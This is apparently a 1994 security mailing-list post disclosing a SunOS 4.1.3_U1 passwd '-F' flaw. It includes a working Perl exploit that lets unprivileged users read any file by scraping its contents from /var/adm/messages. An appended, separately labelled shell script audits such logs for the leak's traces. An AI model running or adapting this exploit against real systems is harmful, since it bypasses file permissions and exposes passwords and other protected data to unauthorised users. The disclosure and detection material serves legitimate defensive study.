FYI, this vulnerability exists on 4.1.3_U1. I do not know how widespread knowledge of this vulnerability is, but I have seen Suns running a modified passwd program that has "-F option disabled" (according to the message output by passwd). So somebody out there has known about it for a while. The following trivial perl script allows non-privileged users to easily read any file on the system.

--steve

--
Steve Mitchell KD6BET TIP#168    steve_mitchell@csufresno.edu
"STUFF: Anything that can be used for homebrewing."
"JUNK: Everything else you thought could be used for homebrewing, but can't."
        --Steve Casselman

#!/usr/local/bin/perl
#
# Author disclaims all responsibility for misuse of this script
#     --sjm 5/10/94
$file = shift || die "Usage: $0 filename\n";
open(A,"</var/adm/messages");
@statf = stat(A);
system("/usr/bin/passwd -F $file 1>&2 2>/dev/null");
seek(A,$statf[7],0);
while(<A>) {
    next if !/passwd/;
    ($stuff,$line) = split(/"/,$_,2);
    print $line;
}
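A defender-side check for the trace the script above depends on, added here as an example and not part of the original post: the script filters /var/adm/messages for lines that contain "passwd" and prints whatever follows the first double quote, so the same two properties can be used to audit a log. The function names are hypothetical, and the sample log lines are constructed with an assumed message wording, since the post does not show the real passwd log text.

```shell
#!/bin/sh
# Added example, not from the original post. Function names are hypothetical.

# Print how many log lines mention "passwd" and carry double-quoted text,
# the two properties the posted script filters on.
count_passwd_quotes() {
    awk '/passwd/ && /"/ { n++ } END { print n + 0 }' "$1"
}

# Print line number and header of each such line; the quoted payload is
# replaced by its length so the report does not repeat leaked content.
list_passwd_quotes() {
    awk '/passwd/ && /"/ {
        i = index($0, "\"")
        printf "%d: %s\"[redacted, %d bytes]\n", NR, substr($0, 1, i - 1), length($0) - i
    }' "$1"
}

# Succeed if the log file grants read permission to "other".
log_world_readable() {
    [ -n "$(find "$1" -prune -perm -004 2>/dev/null)" ]
}

# Write a CONSTRUCTED sample log; the message wording is assumed, not SunOS output.
make_sample() {
    cat > "$1" <<'EOF'
May 10 09:00:01 sun1 login: ROOT LOGIN console
May 10 09:02:10 sun1 passwd[201]: constructed message "first line of a file"
May 10 09:02:10 sun1 passwd[201]: constructed message "second line"
May 10 09:06:00 sun1 passwd[305]: password changed for bob
EOF
}

# Scan the file given as $1, or the constructed sample when none is given.
log="${1:-}"
if [ -z "$log" ]; then
    log="${TMPDIR:-/tmp}/passwd_scan_sample.$$"
    make_sample "$log"
    cleanup=1
fi
echo "suspect passwd entries: $(count_passwd_quotes "$log")"
list_passwd_quotes "$log"
if log_world_readable "$log"; then
    echo "WARNING: $log is readable by all users"
fi
if [ -n "${cleanup:-}" ]; then rm -f "$log"; fi
```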